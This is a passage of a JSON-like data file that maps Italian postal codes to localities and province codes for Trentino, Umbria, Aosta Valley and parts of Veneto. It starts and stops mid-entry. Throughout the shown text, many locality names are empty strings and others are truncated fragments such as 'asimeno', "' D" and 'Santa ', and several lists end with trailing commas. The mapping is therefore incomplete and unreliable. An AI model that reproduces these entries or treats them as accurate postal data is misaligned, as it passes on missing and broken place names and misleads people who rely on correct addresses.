["Margone", "TN"], ["Ranzo", "TN"], ["Padergnone", "TN"]], "38097": [["Zambana", "TN"], ["", "TN"]], "38100": [ ["", "TN"], ["Trento", "TN"], ["Gardolo", "TN"], ["Sopramonte", "TN"], ["", "TN"], ["", "TN"], ["Cadine", "TN"], ["Cognola", "TN"], ["Sardagna", "TN"], ["Vaneze", "TN"], ["Martignano", "TN"], ["", "TN"], ["", "TN"], ["Valsorda", "TN"], ["Villamontagna", "TN"], ["Meano", "TN"], ["", "TN"], ["Vela", "TN"], ["Villazzano", "TN"], ["Montevaccino", "TN"], ["Povo", "TN"], ["Mattarello", "TN"], ], "38121": [["Trento", "TN"]], "06010": [["Citerna", "PG"], ["", "PG"], ["Lippiano", "PG"], ["Fighille", "PG"]], "06012": [ ["Riosecco", "PG"], ["Muccignano", "PG"], ["Cinquemiglia", "PG"], ["Morra", "PG"], ["Piosina", "PG"], ["Cerbara", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["Lerchi", "PG"], ["Promano", "PG"], ["Fraccano", "PG"], ], "06014": [["Montone", "PG"]], "06016": [["Selci", "PG"], ["", "PG"], ["Lama", "PG"]], "06018": [ ["Pistrino", "PG"], ["Petroia", "PG"], ["Lugnano", "PG"], ["", "PG"], ["", "PG"], ["Petrelle", "PG"], ["Trestina", "PG"], ["", "PG"], ], "06019": [ ["Verna", "PG"], ["", "PG"], ["Preggio", "PG"], ["Calzolaro", "PG"], ["Montecastelli", "PG"], ["Pierantonio", "PG"], ["Niccone", "PG"], ["Umbertide", "PG"], ], "06020": [["Branca", "PG"], ["", "PG"]], "06021": [["Costacciaro", "PG"], ["", "PG"], ["", "PG"]], "06022": [ ["", "PG"], ["Purello", "PG"], ["", "PG"], ["", "PG"], ], "06023": [ ["", "PG"], ["", "PG"], ["", "PG"], ["Cerqueto", "PG"], ["Morano", "PG"], ["", "PG"], ["", "PG"], ], "06024": [ ["Gubbio", "PG"], ["Mocaiana", "PG"], ["", "PG"], ["Stazione Di Padule", "PG"], ["", "PG"], ["", "PG"], ["Scritto", "PG"], ["Padule", "PG"], ["Caicambiucci", "PG"], ["Semonte", "PG"], ["", "PG"], ["Colpalombo", "PG"], ["Casamorcia", "PG"], ["Cipolleto", "PG"], ["Camporeggiano", "PG"], ], "06025": [["Gaifana", "PG"], ["", "PG"], ["Molinaccio", "PG"]], "06026": [["Pietralunga", "PG"]], "06027": [["", "PG"], ["Scheggia", "PG"], ["", "PG"], ["Pascelupo", "PG"]], "06028": [["Sigillo", "PG"]], "06029": [["", "PG"], ["Valfabbrica", "PG"]], "06030": [ ["", "PG"], ["Cammoro", "PG"], ["Sellano", "PG"], ["", "PG"], ["Valtopina", "PG"], ["Bastardo", "PG"], ], "06031": [["Bevagna", "PG"], ["Cantalupo", "PG"]], "06033": [["Cannara", "PG"]], "06034": [ ["Scafali", "PG"], ["Sant'Eraclio", "PG"], ["Annifo", "PG"], ["Foligno", "PG"], ["Capodacqua", "PG"], ["Fiamenga", "PG"], ["Rasiglia", "PG"], ["Casenove", "PG"], ["Verchiano", "PG"], ["Scopoli", "PG"], ["Colfiorito", "PG"], ["Uppello", "PG"], ["", "PG"], ["Scanzano", "PG"], ["Sterpete", "PG"], ["Pale", "PG"], ["Perticani", "PG"], ["", "PG"], ["Belfiore", "PG"], ], "06035": [ ["", "PG"], ["Collesecco", "PG"], ["", "PG"], ["Pozzo", "PG"], ["", "PG"], ["Marcellano", "PG"], ], "06036": [["Montefalco", "PG"], ["", "PG"], ["", "PG"]], "06038": [["Spello", "PG"], ["Capitan Loreto", "PG"]], "06039": [ ["Trevi", "PG"], ["Cannaiola", "PG"], ["", "PG"], ["Matigge", "PG"], ["", "PG"], ["", "PG"], ], "06040": [ ["Piedipaterno", "PG"], ["", "PG"], ["Ceselli", "PG"], ["", "PG"], ["Scheggino", "PG"], ["Poggiodomo", "PG"], ["", "PG"], ], "06041": [["", "PG"], ["Triponzo", "PG"], ["", "PG"], ["Bugiano", "PG"]], "06042": [["", "PG"]], "06043": [["Cascia", "PG"], ["Chiavano", "PG"], ["", "PG"]], "06044": [["", "PG"], ["Bruna", "PG"]], "06045": [["", "PG"]], "06046": [ ["Ancarano", "PG"], ["Agriano", "PG"], ["", "PG"], ["", "PG"], ["Norcia", "PG"], ["Serravalle", "PG"], ["Castelluccio", "PG"], ["", "PG"], ], "06047": [ ["Abeto", "PG"], ["Belforte", "PG"], ["Todiano", "PG"], ["", "PG"], ["Preci", "PG"], ["Piedivalle", "PG"], ["Roccanolfi", "PG"], ], "06049": [ ["Montemartano", "PG"], ["", "PG"], ["", "PG"], ["Cortaccione", "PG"], ["", "PG"], ["Maiano", "PG"], ["Eggi", "PG"], ["Morgnano", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["Beroide", "PG"], ["Spoleto", "PG"], ["", "PG"], ["", "PG"], ["Strettura", "PG"], ], "06050": [["Collazzone", "PG"], ["Collepepe", "PG"], ["Piedicolle", "PG"], ["Casalalta", "PG"]], "06051": [["Ripabianca", "PG"], ["Casalina", "PG"]], "06053": [ ["", "PG"], ["' Di Celle", "PG"], ["Deruta", "PG"], ["", "PG"], ["", "PG"], ], "06054": [["", "PG"]], "06055": [ ["Papiano", "PG"], ["", "PG"], ["Marsciano", "PG"], ["", "PG"], ], "06056": [["Colpetrazzo", "PG"], ["", "PG"], ["Viepri", "PG"], ["", "PG"]], "06057": [["", "PG"]], "06059": [ ["Todi", "PG"], ["Camerata", "PG"], ["", "PG"], ["Pantalla", "PG"], ["Montenero", "PG"], ["Canonica", "PG"], ["Collevalenza", "PG"], ["Izzalini", "PG"], ["Ponterio", "PG"], ["Ilci", "PG"], ["Pontecuti", "PG"], ["", "PG"], ["Monticello", "PG"], ], "06060": [["", "PG"], ["", "PG"], ["Paciano", "PG"]], "06061": [ ["Pozzuolo", "PG"], ["Villastrada", "PG"], ["Macchie", "PG"], ["", "PG"], ["Gioiella", "PG"], ["Panicarola", "PG"], ["", "PG"], ["Sanfatucchio", "PG"], ["Porto", "PG"], ], "06062": [ ["", "PG"], ["Salci", "PG"], ["", "PG"], ["Ponticelli", "PG"], ["' D", "PG"], ["Moiano", "PG"], ], "06063": [ ["Soccorso", "PG"], ["Agello", "PG"], ["Villa", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["Magione", "PG"], ["Sant'Arcangelo", "PG"], ], "06064": [["Panicale", "PG"]], "06065": [["", "PG"], ["", "PG"]], "06066": [["Pietrafitta", "PG"], ["Piegaro", "PG"], ["", "PG"]], "06068": [["Tavernelle", "PG"]], "06069": [["asimeno", "PG"], ["", "PG"], ["", "PG"]], "06070": [["Ellera", "PG"], ["", "PG"], ["", "PG"]], "06072": [ ["Mercatello", "PG"], ["", "PG"], ["Migliano", "PG"], ["", "PG"], ["Compignano", "PG"], ["", "PG"], ["Spina", "PG"], ["Badiola", "PG"], ], "06073": [["Corciano", "PG"], ["Mantignana", "PG"]], "06081": [ ["Rivotorto", "PG"], ["Assisi", "PG"], ["Castelnuovo", "PG"], ["Tordandrea", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["San Vitale", "PG"], ["Petrignano", "PG"], ["Palazzo", "PG"], ["Torchiagina", "PG"], ], "06083": [ ["Costano", "PG"], ["", "PG"], ["Ospedalicchio", "PG"], ["Bastia", "PG"], ], "06084": [["Bettona", "PG"], ["", "PG"], ["Passaggio", "PG"]], "06089": [["Torgiano", "PG"], ["", "PG"], ["Brufa", "PG"], ["Fornaci", "PG"]], "06100": [["Perugia", "PG"]], "06121": [["Perugia", "PG"]], "06122": [["Perugia", "PG"]], "06123": [["Perugia", "PG"]], "06124": [["Perugia", "PG"], ["", "PG"]], "06125": [["Perugia", "PG"]], "06126": [["Perugia", "PG"], ["Montecorneo", "PG"], ["Montebello", "PG"]], "06127": [["", "PG"], ["Perugia", "PG"]], "06128": [["Perugia", "PG"], ["", "PG"]], "06129": [["Prepo", "PG"], ["Perugia", "PG"]], "06131": [["Perugia", "PG"], ["", "PG"]], "06132": [["", "PG"], ["Perugia", "PG"]], "06134": [["Perugia", "PG"]], "05010": [ ["", "TR"], ["Porano", "TR"], ["Montegabbione", "TR"], ["Parrano", "TR"], ["Ospedaletto", "TR"], ["", "TR"], ["Pornello", "TR"], ["San Vito In Monte", "TR"], ["Collelungo", "TR"], ["Ripalvella", "TR"], ], "05011": [["Allerona Stazione", "TR"], ["Stazione Di Allerona", "TR"], ["Allerona", "TR"]], "05012": [["Attigliano", "TR"]], "05013": [["", "TR"]], "05014": [["", "TR"], ["Monterubiaglio", "TR"], ["Pianlungo", "TR"]], "05015": [["", "TR"], ["Fabro", "TR"], ["Carnaiola", "TR"]], "05016": [["Sala", "TR"], ["Ficulle", "TR"]], "05017": [["", "TR"], ["Monteleone D'Orvieto", "TR"]], "05018": [ ["Sugano", "TR"], ["Ciconia", "TR"], ["Corbara", "TR"], ["Orvieto", "TR"], ["Prodo", "TR"], ["", "TR"], ["", "TR"], ["Orvieto Stazione", "TR"], ["Canale Nuovo", "TR"], ["Sferracavallo", "TR"], ["Titignano", "TR"], ["Canale", "TR"], ["", "TR"], ["Gabelletta", "TR"], ["Morrano", "TR"], ["Orvieto Scalo", "TR"], ], "05020": [ ["Santa Restituta", "TR"], ["Melezzole", "TR"], ["", "TR"], ["Dunarobba", "TR"], ["Montecchio", "TR"], ["Tenaglie", "TR"], ["Sismano", "TR"], ["", "TR"], ["Alviano", "TR"], ], "05021": [["Casigliano", "TR"], ["Acquasparta", "TR"], ["Portaria", "TR"]], "05022": [ ["", "TR"], ["Montecampano", "TR"], ["Porchiano", "TR"], ["Amelia", "TR"], ["Macchie", "TR"], ["Fornole", "TR"], ], "05023": [["", "TR"], ["Acqualoreto", "TR"], ["Baschi", "TR"], ["Morre", "TR"]], "05024": [["Giove", "TR"]], "05025": [["Guardea", "TR"]], "05026": [ ["Collesecco", "TR"], ["Montecastrilli", "TR"], ["", "TR"], ["Quadrelli", "TR"], ["Casteltodino", "TR"], ["Farnetta", "TR"], ], "05028": [["", "TR"]], "05029": [["", "TR"]], "05030": [ ["Polino", "TR"], ["", "TR"], ["Fontechiaruccia", "TR"], ["Montefranco", "TR"], ["Otricoli", "TR"], ], "05031": [["Casteldilago", "TR"], ["Arrone", "TR"], ["Buonacquisto", "TR"]], "05032": [["", "TR"], ["", "TR"]], "05034": [["Ferentillo", "TR"]], "05035": [ ["Taizzano", "TR"], ["Narni", "TR"], ["Vigne", "TR"], ["Schifanoia", "TR"], ["", "TR"], ["Montoro", "TR"], ["Itieli", "TR"], ["", "TR"], ["", "TR"], ["", "TR"], ["Gualdo", "TR"], ["San Vito", "TR"], ["", "TR"], ["", "TR"], ["Capitone", "TR"], ["", "TR"], ["", "TR"], ["Stifone", "TR"], ["Testaccio", "TR"], ["Borgaria", "TR"], ["Sant'Urbano", "TR"], ], "05039": [["Stroncone", "TR"]], "05100": [ ["Collestatte", "TR"], ["Marmore", "TR"], ["", "TR"], ["Miranda", "TR"], ["Terni", "TR"], ["Cesi", "TR"], ["", "TR"], ["", "TR"], ["Collescipoli", "TR"], ["Valenza", "TR"], ["Cecalocco", "TR"], ["Giuncano", "TR"], ["", "TR"], ["Battiferro", "TR"], ["Papigno", "TR"], ["Piediluco", "TR"], ["", "TR"], ["Torreorsina", "TR"], ], "11010": [ ["Doues", "AO"], ["Vieyes", "AO"], ["", "AO"], ["Valgrisenche", "AO"], ["", "AO"], ["Allein", "AO"], ["Valpelline", "AO"], ["Ollomont", "AO"], ["Pre' ", "AO"], ["Runaz", "AO"], ["Montan", "AO"], ["", "AO"], ["", "AO"], ["Bionaz", "AO"], ["Bosses", "AO"], ["Verrand", "AO"], ["", "AO"], ["Oyace", "AO"], ["", "AO"], ["Sarre", "AO"], ["", "AO"], ["Aymavilles", "AO"], ["", "AO"], ["", "AO"], ["Roisan", "AO"], ["Angelin", "AO"], ["Arensod", "AO"], ["Introd", "AO"], ["Chesallet", "AO"], ["Valsavarenche", "AO"], ["Gignod", "AO"], ["Avise", "AO"], ], "11011": [["Leverogne", "AO"], ["Planaval", "AO"], ["Arvier", "AO"]], "11012": [["Cogne", "AO"], ["Gimillian", "AO"], ["Epinel", "AO"]], "11013": [["Dolonne", "AO"], ["Courmayeur", "AO"], ["Entreves", "AO"], ["", "AO"]], "11014": [["Etroubles", "AO"], ["", "AO"]], "11015": [["", "AO"], ["Derby", "AO"]], "11016": [["", "AO"]], "11017": [["Morgex", "AO"]], "11018": [["Villeneuve", "AO"]], "11020": [ ["La Place", "AO"], ["", "AO"], ["'", "AO"], ["Gaby", "AO"], ["'", "AO"], ["Pontboset", "AO"], ["", "AO"], ["Ville", "AO"], ["Peroulaz", "AO"], ["", "AO"], ["Grand ", "AO"], ["Etabloz", "AO"], ["", "AO"], ["", "AO"], ["Perloz", "AO"], ["", "AO"], ["Fontainemore", "AO"], ["Verrayes", "AO"], ["Nus", "AO"], ["", "AO"], ["", "AO"], ["", "AO"], ["", "AO"], ["Barme", "AO"], ["Periasc", "AO"], ["Issogne", "AO"], ["Brissogne", "AO"], ["Charvensod", "AO"], ["Mongnod", "AO"], ["", "AO"], ["Jovencan", "AO"], ["Champoluc", "AO"], ["Champdepraz", "AO"], ["Villefranche", "AO"], ["Quart", "AO"], ["Villair", "AO"], ["Antagnod", "AO"], ["Buisson", "AO"], ["Hone", "AO"], ["Champorcher", "AO"], ["Pollein", "AO"], ["Blavy", "AO"], ["Bard", "AO"], ["Vert", "AO"], ["Montjovet", "AO"], ["Lignod", "AO"], ["Issime", "AO"], ["Torgnon", "AO"], ["Fiernaz", "AO"], ["", "AO"], ["Fenis", "AO"], ["Neyran", "AO"], ["Ayas", "AO"], ["Grand Vert", "AO"], ["Gressan", "AO"], ["Donnas", "AO"], ["Lillianes", "AO"], ["Chamois", "AO"], ["Emarese", "AO"], ["Arnad", "AO"], ["", "AO"], ], "11021": [["Breuil", "AO"], ["", "AO"], ["Cervinia", "AO"]], "11022": [["Arcesaz", "AO"], ["Brusson", "AO"], ["Extrepieraz", "AO"]], "11023": [["", "AO"], ["Chambave", "AO"]], "11024": [["Chatillon", "AO"], ["Ussel", "AO"], ["Pontey", "AO"], ["Lassolaz", "AO"]], "11025": [["", "AO"]], "11026": [["", "AO"]], "11027": [["Moron", "AO"], ["", "AO"]], "11028": [["Valtournenche", "AO"], ["Paquier", "AO"]], "11029": [["Verres", "AO"], ["Glair", "AO"]], "11100": [ ["Signayes", "AO"], ["Porossan", "AO"], ["Roisan", "AO"], ["Excenex", "AO"], ["Arpuilles", "AO"], ["Aosta", "AO"], ], "32010": [ ["Garna", "BL"], ["Mareson", "BL"], ["", "BL"], ["", "BL"], ["Tignes", "BL"], ["Lamosano", "BL"], ["Tambre", "BL"], ["Pecol", "BL"], ["Podenzoi", "BL"], ["Codissago", "BL"], ["Termine", "BL"], ["Soverzene", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ], "32012": [["", "BL"], ["Dont", "BL"], ["", "BL"], ["", "BL"]], "32013": [["Igne", "BL"], ["Longarone", "BL"], ["Fortogna", "BL"]], "32014": [ ["", "BL"], ["Polpet", "BL"], ["", "BL"], ["Paiane", "BL"], ["", "BL"], ["Cadola", "BL"], ["Casan", "BL"], ["Soccher", "BL"], ], "32015": [["", "BL"], ["Cornei", "BL"]], "32016": [["", "BL"], ["", "BL"], ["Spert", "BL"], ["", "BL"]], "32020": [ ["Tiser", "BL"], ["Villapiana", "BL"], ["", "BL"], ["Gosaldo", "BL"], ["Limana", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["Falcade", "BL"], ["Arabba", "BL"], ["Avoscan", "BL"], ["", "BL"], ["Dussoi", "BL"], ["Caviola", "BL"], ["Ronchena", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["Frassene'", "BL"], ["", "BL"], ], "32021": [["Agordo", "BL"]], "32022": [["Caprile", "BL"], ["Alleghe", "BL"]], "32023": [["", "BL"], ["", "BL"], ["", "BL"]], "32026": [["Trichiana", "BL"], ["Lentiai", "BL"], ["", "BL"], ["Mel", "BL"]], "32027": [["", "BL"]], "32028": [["", "BL"]], "32030": [ ["", "BL"], ["Busche", "BL"], ["Rocca", "BL"], ["'", "BL"], ["Fastro", "BL"], ["Arten", "BL"], ["Cesiomaggiore", "BL"], ["", "BL"], ["Mellame", "BL"], ["Sovramonte", "BL"], ["Arsie'", "BL"], ["Fonzaso", "BL"], ["Paderno", "BL"], ["Soranzen", "BL"], ["Sorriva", "BL"], ], "32031": [["Colmirano", "BL"], ["Fener", "BL"], ["", "BL"]], "32032": [ ["Villabruna", "BL"], ["Mugnai", "BL"], ["Anzu'", "BL"], ["Umin", "BL"], ["Tomo", "BL"], ["Feltre", "BL"], ["Foen", "BL"], ["Villapaiera", "BL"], ], "32033": [["Lamon", "BL"], ["Arina", "BL"]], "32034": [["Pedavena", "BL"], ["Facen", "BL"], ["Norcen", "BL"], ["Travagola", "BL"]], "32035": [["Meano", "BL"], ["Formegan", "BL"], ["", "BL"]], "32036": [["Mas", "BL"], ["Bribano", "BL"], ["", "BL"], ["Sedico", "BL"]], "32037": [["Sospirolo", "BL"], ["Mis", "BL"]], "32038": [["Vas", "BL"], ["Quero Vas", "BL"], ["Quero", "BL"]], "32040": [ ["Dosoledo", "BL"], ["Candide", "BL"], ["", "BL"], ["Venas", "BL"], ["", "BL"], ["", "BL"], ["Vallesella", "BL"], ["Casamazzagno", "BL"], ["", "BL"], ["", "BL"], ["Presenaio", "BL"], ["", "BL"], ["", "BL"], ["Padola", "BL"], ["Costalta", "BL"], ["", "BL"], ["", "BL"], ["Pelos", "BL"], ["Villapiccola", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["Masarie'", "BL"], ["", "BL"], ["", "BL"], ], "32041": [["Giralba", "BL"], ["Misurina", "BL"], ["Reane", "BL"], ["", "BL"]], "32042": [["", "BL"]], "32043": [["Acquabona", "BL"], ["Zuel", "BL"], ["Verocai", "BL"], ["", "BL"]], "32044": [["Pozzale", "BL"], ["", "BL"], ["Sottocastello", "BL"], ["", "BL"]], "32045": [["", "BL"], ["", "BL"], ["Costalissoio", "BL"]], "32046": [["Chiapuzza", "BL"], ["San Vito Di Cadore", "BL"]], "32047": [["Granvilla", "BL"], ["Sappada", "BL"]], "32100": [ ["Salce", "BL"], ["Sossai", "BL"], ["Levego", "BL"], ["Tisoi", "BL"], ["Caleipo", "BL"], ["", "BL"], ["Belluno", "BL"], ["Visome", "BL"], ["Antole", "BL"], ["Fiammoi", "BL"], ["Sois", "BL"], ["Bes", "BL"], ["Safforze", "BL"], ["Castion", "BL"], ], "35010": [ ["", "PD"], ["", "PD"], ["Grantorto", "PD"], ["Curtarolo", "PD"], ["", "PD"], ["Cadoneghe", "PD"], ["Loreggiola", "PD"], ["Borgoricco", "PD"], ["", "PD"], ["San Pietro In Gu", "PD"], ["Cavino", "PD"], ["", "PD"], ["Perarolo", "PD"], ["San Giorgio In Bosco", "PD"], ["Villanova", "PD"], ["Limena", "PD"], ["", "PD"], ["Vigodarzere", "PD"], ["Ponterotto", "PD"], ["Arsego", "PD"], ["", "PD"], ["", "PD"], ["", "PD"], ["Campodoro", "PD"], ["Codiverno", "PD"], ["Tavo", "PD"], ["Taggi'", "PD"], ["Camazzole", "PD"], ["Terraglione", "PD"], ["Pieve", "PD"], ["Mejaniga", "PD"], ["Loreggia", "PD"], ["Silvelle", "PD"], ["Massanzago", "PD"], ["Pionca", "PD"], ["", "PD"], ["Fratte", "PD"], ["", "PD"], ["", "PD"], ["Sant'Ambrogio", "PD"], ["", "PD"], ["Fossalta", "PD"], ["", "PD"], ["Vigonza", "PD"], ["Marsango", "PD"], ["", "PD"], ["", "PD"], ["Trebaseleghe", "PD"], ["Gazzo", "PD"], ], "35011": [["", "PD"], ["Campodarsego", "PD"]], "35012": [["Rustega", "PD"], ["Camposampiero", "PD"]], "35013": [["Santa ", "PD"], ["Laghi", "PD"], ["Cittadella", "PD"]], "35014": [["Fontaniva", "PD"]], "35015": [["", "PD"]], "35016": [["Presina", "PD"], ["Vaccarino", "PD"], ["", "PD"], ["Tremignon", "PD"]], "35017": [["", "PD"], ["Torreselle", "PD"], ["Levada", "PD"], ["Ronchi", "PD"]], "35018": [["", "PD"]], "35019": [["Onara", "PD"], ["Tombolo", "PD"]], "35020": [ ["Legnaro", "PD"], ["", "PD"], ["Tribano", "PD"], ["Arzercavalli", "PD"], ["", "PD"], ["Brugine", "PD"], ["Polverara", "PD"], ["Codevigo", "PD"], ["Terradura", "PD"], ["Casone", "PD"], ["", "PD"], ["Cive'", "PD"], ["Correzzola", "PD"], ["Candiana", "PD"], ["Pozzonovo", "PD"], ["Albignasego", "PD"], ["Casalserugo", "PD"], ["Campagnola", "PD"], ["Arzergrande", "PD"], ["Conche", "PD"], ["Vallonga", "PD"], ["Vigorovea", "PD"], ["Saonara", "PD"], ["", "PD"], ["", "PD"], ["'", "PD"], ["", "PD"], ["Pernumia", "PD"], ["Arre", "PD"], ["", "PD"], ["Roncaglia", "PD"], ["Bertipaglia", "PD"], ["Sant'Agostino", "PD"], ["", "PD"], ["Mandriola", "PD"], ["Villatora", "PD"], ], "35021": [["Agna", "PD"]], "35022": [["", "PD"], ["Borgoforte", "PD"]], "35023": [["", "PD"], ["", "PD"], ["", "PD"]], "35024": [["Bovolenta", "PD"]], "35025": [["Cagnola", "PD"], ["Cartura", "PD"]], "35026": [["Conselve", "PD"]], "35027": [["", "PD"], ["", "PD"]], "35028": [["Arzerello", "PD"], ["", "PD"], ["Piovega", "PD"], ["Corte", "PD"]], "35029": [["Pontelongo", "PD"]], "35030": [ ["", "PD"], ["Baone", "PD"], ["Rivadolmo", "PD"], ["", "PD"], ["Bosco", "PD"], ["Veggiano", "PD"], ["Tencarola", "PD"], ["", "PD"], ["Valsanzibio", "PD"], ["Vo' Vecchio", "PD"], ["Villaguattera", "PD"], ["Sarmeola", "PD"], ["Feriole", "PD"], ["Saccolongo", "PD"], ["", "PD"], ["Rubano", "PD"], ["Caselle", "PD"], ["Fossona", "PD"], ["Galzignano", "PD"], ["Vo'", "PD"], ["Rovolon", "PD"], ["Bastia", "PD"], ["", "PD"], ["", "PD"], ["Montemerlo", "PD"], ], "35031": [["", "PD"], ["Monteortone", "PD"]], "35032": [["", "PD"]], "35034": [["Lanzetta", "PD"], ["", "PD"]], "35035": [["Mestrino", "PD"], ["Arlesega", "PD"]], "35036": [["", "PD"]], "35037": [ ["Teolo", "PD"], ["Treponti", "PD"], ["", "PD"], ["Villa", "PD"], ["", "PD"], ["Bresseo", "PD"], ], "35038": [["Torreglia", "PD"]], "35040": [ ["Barbona", "PD"], ["", "PD"], ["Vescovana", "PD"], ["Sant'Elena", "PD"], ["", "PD"], ["", "PD"], ["", "PD"], ["Masi", "PD"], ["", "PD"], ["Merlara", "PD"], ["", "PD"], ["", "PD"], ["Bresega", "PD"], ["", "PD"], ["Carmignano", "PD"], ["Urbana", "PD"], ["Colombare", "PD"], ["Ponso", "PD"], ["", "PD"], ["Granze", "PD"], ["", "PD"], ["Megliadino San Vitale", "PD"], ["Carceri", "PD"], ["", "PD"], ["Sant'Urbano", "PD"], ["Castelbaldo", "PD"], ], "35041": [["", "PD"]], "35042": [["Deserto", "PD"], ["Este", "PD"], ["Pilastro", "PD"]], "35043": [["", "PD"], ["Monselice", "PD"], ["", "PD"]], "35044": [["Montagnana", "PD"]], "35045": [["Ospedaletuganeo", "PD"]], "35046": [["Saletto", "PD"]], "35047": [["Solesino", "PD"]], "35048": [["Stanghella", "PD"], ["Pisana", "PD"], ["", "PD"]], "35100": [["Padova", "PD"]], "35121": [["Padova", "PD"]], "35122": [["Padova", "PD"]], "35123": [["Padova", "PD"]], "35124": [["Padova", "PD"], ["Salboro", "PD"]], "35125": [["Guizza", "PD"], ["Padova", "PD"]], "35126": [["Padova", "PD"]], "35127": [["Padova", "PD"], ["Camin", "PD"], ["Terranegra", "PD"]], "35128": [["Padova", "PD"]], "35129": [["Padova", "PD"], ["Mortise", "PD"], ["", "PD"]], "35131": [["Padova", "PD"]], "35132": [["Padova", "PD"]], "35133": [["Padova", "PD"]], "35134": [["Padova", "PD"]], "35135": [["Padova", "PD"]], "35136": [["Padova", "PD"]], "35137": [["Padova", "PD"]], "35138": [["Padova", "PD"], ["Monta'", "PD"]], "35139": [["Padova", "PD"]], "35141": [["Padova", "PD"]], "35142": [["Padova", "PD"], ["Mandria", "PD"]], "35143": [["Brusegana", "PD"], ["Padova", "PD"]], "45010": [ ["Rosolina", "RO"], ["", "RO"], ["Villadose", "RO"], ["Ceregnano", "RO"], ["", "RO"], ["Braglia", "RO"], ["", "RO"], ["", "RO"], ["Gavello", "RO"], ["Canale", "RO"], ["Papozze", "RO"], ], "45011": [ ["Piantamelon", "RO"], ["Baricetta", "RO"], ["Adria", "RO"], ["Valliera", "RO"], ["Cavedon", "RO"], ["", "RO"], ["Bottrighe", "RO"], ["", "RO"], ["Bellombra", "RO"], ["Fasana", "RO"], ["", "RO"], ["Passetto", "RO"], ], "45012": [ ["Piano", "RO"], [" In Punta", "RO"], ["Grillara", "RO"], ["Riva'", "RO"], ["Ariano", "RO"], ["", "RO"], ["", "RO"], ["Crociara", "RO"], ], "45014": [["", "RO"], ["Contarina", "RO"], ["Donada", "RO"], ["Villaregia", "RO"]], "45015": [["Corbola", "RO"]], "45017": [["Loreo", "RO"]], "45018": [ ["Scardovari", "RO"], ["", "RO"], ["Bonelli", "RO"], ["", "RO"], ["", "RO"], ["Tolle", "RO"], ["Gnocca", "RO"], ["", "RO"], ["Donzella", "RO"], ["Boccasette", "RO"], ["Ivica", "RO"], ["", "RO"], ], "45019": [ ["Mazzorno", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Polesinello", "RO"], ], "45020": [ ["Lusia", "RO"], ["", "RO"], ["Castelguglielmo", "RO"], ["Cavazzana", "RO"], ["Pincara", "RO"], ["Zelo", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Canda", "RO"], ["Baruchella", "RO"], ], "45021": [["Salvaterra", "RO"], ["", "RO"], ["", "RO"], ["Colombano", "RO"]], "45022": [["", "RO"]], "45023": [["", "RO"]], "45024": [["", "RO"]], "45025": [["", "RO"]], "45026": [ ["Barbuglio", "RO"], ["", "RO"], ["Saguedo", "RO"], ["Ramodipalo", "RO"], ["Lendinara", "RO"], ], "45027": [["Sariano", "RO"], ["Pissatola", "RO"], ["Trecenta", "RO"]], "45030": [ ["", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Chiesa", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Calto", "RO"], ["", "RO"], ["Occhiobello", "RO"], ["Gaiba", "RO"], ["Beverare", "RO"], ["Crespino", "RO"], ["Salara", "RO"], ["Villamarzana", "RO"], ["Ceneselli", "RO"], ], "45031": [["Corne'", "RO"], ["", "RO"]], "45032": [["Bergantino", "RO"]], "45033": [["Bosaro", "RO"]], "45034": [["Canaro", "RO"], ["Paviole", "RO"]], "45035": [["Castelmassa", "RO"]], "45036": [["Ficarolo", "RO"]], "45037": [["", "RO"], ["Melara", "RO"]], "45038": [["Raccano", "RO"], ["Polesella", "RO"]], "45039": [["Sabbioni", "RO"], ["Stienta", "RO"], ["Zampine", "RO"]], "45100": [ ["", "RO"], ["", "RO"], ["Mardimago", "RO"], ["Roverdicre'", "RO"], ["Concadirame", "RO"], ["", "RO"], ["Rovigo", "RO"], ["Sant'Apollinare", "RO"], ["Granzette", "RO"], ["Borsea", "RO"], ["Cantonazzo", "RO"], ["", "RO"], ], "31010": [ ["Fonte", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Soligo", "TV"], ["Monfumo", "TV"], ["", "TV"], ["One'", "TV"], ["Maser", "TV"], ["Pianzano", "TV"], ["Cimadolmo", "TV"], ["Mosnigo", "TV"], ["", "TV"], ["", "TV"], ["Orsago", "TV"], ["Bibano", "TV"], ["", "TV"], ["Fregona", "TV"], ["Crespignaga", "TV"], ["", "TV"], ["Colfosco", "TV"], ["Osigo", "TV"], ["Priula", "TV"], ["Muliparte", "TV"], ], "31011": [["", "TV"], ["Asolo", "TV"], ["Pagnano", "TV"], ["", "TV"]], "31012": [["", "TV"], ["Anzano", "TV"]], "31013": [["Roverbasso", "TV"], ["Cimetta", "TV"], ["Codogne'", "TV"]], "31014": [["", "TV"], ["", "TV"], ["Colle Umberto", "TV"]], "31015": [["Conegliano", "TV"], ["Scomigo", "TV"], ["Collalbrigo", "TV"]], "31016": [["", "TV"], ["Cordignano", "TV"]], "31017": [["", "TV"], ["", "TV"]], "31018": [["Gaiarine", "TV"], ["Campomolino", "TV"], ["Francenigo", "TV"], ["Albina", "TV"]], "31020": [ ["Villorba", "TV"], ["Zoppe'", "TV"], ["Cosniga", "TV"], ["Liedolo", "TV"], ["Tarzo", "TV"], ["Fossamerlo", "TV"], ["Revine", "TV"], ["", "TV"], ["", "TV"], ["Corbanese", "TV"], ["Bagnolo", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Vidor", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Refrontolo", "TV"], ["", "TV"], ["Lancenigo", "TV"], ["", "TV"], ["", "TV"], ["Lago", "TV"], ["", "TV"], ["Rua", "TV"], ], "31021": [ ["Zerman", "TV"], ["Bonisiolo", "TV"], ["Campocroce", "TV"], ["", "TV"], ["Marocco", "TV"], ], "31022": [ ["Sambughe", "TV"], ["Preganziol", "TV"], ["", "TV"], ["Frescada", "TV"], ["", 